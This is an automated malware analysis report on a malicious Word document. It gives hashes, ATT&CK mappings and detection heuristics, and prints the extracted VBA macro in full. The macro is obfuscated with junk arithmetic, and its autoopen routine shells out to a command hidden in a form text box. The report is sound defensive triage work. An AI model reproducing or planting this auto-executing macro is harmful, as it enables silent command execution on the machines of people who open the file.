Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8dcc90e3dafa933…

MALICIOUS

Office (OLE)

Size: 143.4 KB
Created: 2018-12-19 07:12:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: d0953c82012236f8c4888ae4f502550e
SHA-1: cf6540773ed973eeaf4588f1f45c68a84b49ae62
SHA-256: c8dcc90e3dafa9333a74350466330a04337a522598076e97fc54a07b62e31d8e
Risk Score: 250

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File

The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate the use of the Shell() function to execute commands, likely to download and run a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics (8)

  • ClamAV: Doc.Malware.Generic-6788980-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6788980-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
                  End Select
    P94446352 = Array(m385804293, P5412060, A22804128, Interaction.Shell(R07544554762.TextBox1, 31 - 31), U44043)
       Select Case m196
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    i67303792
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4807 bytes
SHA-256: 6604dea4d0e66accaa79248363778812bea46e9d58e056c353007ce82ffb365e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "R07544554762"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
i67303792
End Sub

Attribute VB_Name = "N48564231"
Function i67303792()
On Error Resume Next
   Select Case q4980
         Case 330998156
Q736 = F779
            z637 = Tan(m587 - Round(o334) / 341911400 - Tan(j1237))
X3269 = Z376
M313 = Round(n750 * Chr(106457969))
         Case 208112041
E5066 = f665
            G065 = 301969932
P4839 = F0353
            u7797 = Round(I090 + Tan(A1992 + Log(305602630) - i385 / Hex(223075246)))
              End Select
   Select Case h3865
         Case 172428590
Q014 = M634
            d606 = Tan(I613 - Round(Q2311) / 77887831 - Tan(H2478))
O515 = a436
u4111 = Round(G363 * Chr(333807020))
         Case 13977045
j149 = U2199
            j148 = 51715933
u4834 = A3591
            G643 = Round(T517 + Tan(q5916 + Log(307710191) - w041 / Hex(338600911)))
              End Select
   Select Case O423
         Case 226374491
P1769 = f9139
            F516 = Tan(B184 - Round(A6538) / 175044476 - Tan(R905))
R954 = f8620
Q912 = Round(Q2204 * Chr(164755658))
         Case 24298859
J611 = k496
            H2171 = 139384503
p712 = V848
            l868 = Round(q4246 + Tan(K5768 + Log(277100825) - C6718 / Hex(317291469)))
              End Select
P94446352 = Array(m385804293, P5412060, A22804128, Interaction.Shell(R07544554762.TextBox1, 31 - 31), U44043)
   Select Case m196
         Case 133175371
z100 = N746
            s7056 = Tan(q4043 - Round(F547) / 292757480 - Tan(j9756))
h0025 = m420
E378 = Round(N671 * Chr(335595334))
         Case 178297829
d7950 = j3411
            j7798 = 209324246
L2335 = t472
            d0214 = Round(j9866 + Tan(p1202 + Log(205860149) - i0523 / Hex(260646574)))
              End Select
   Select Case r6403
         Case 48838733
T6177 = P843
            C421 = Tan(n263 - Round(I5719) / 192322963 - Tan(O0101))
Q8506 = k531
T859 = Round(f879 * Chr(4939320))
         Case 72417324
T798 = b522
            l9398 = 218984667
d505 = i222
            P4426 = Round(i148 + Tan(U0892 + Log(132067500) - i6591 / Hex(95495477)))
              End Select
End Function


Attribute VB_Name = "i107726289"

Attribute VB_Name = "m78509262"

Attribute VB_Name = "O26765419"

Attribute VB_Name = "A1519357247990"

Attribute VB_Name = "I5201207615"

Attribute VB_Name = "q9197819092"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "p7478912681"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F8688407688030"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "b396820358"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Q32128734218"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P0685989163320"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T135436896"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False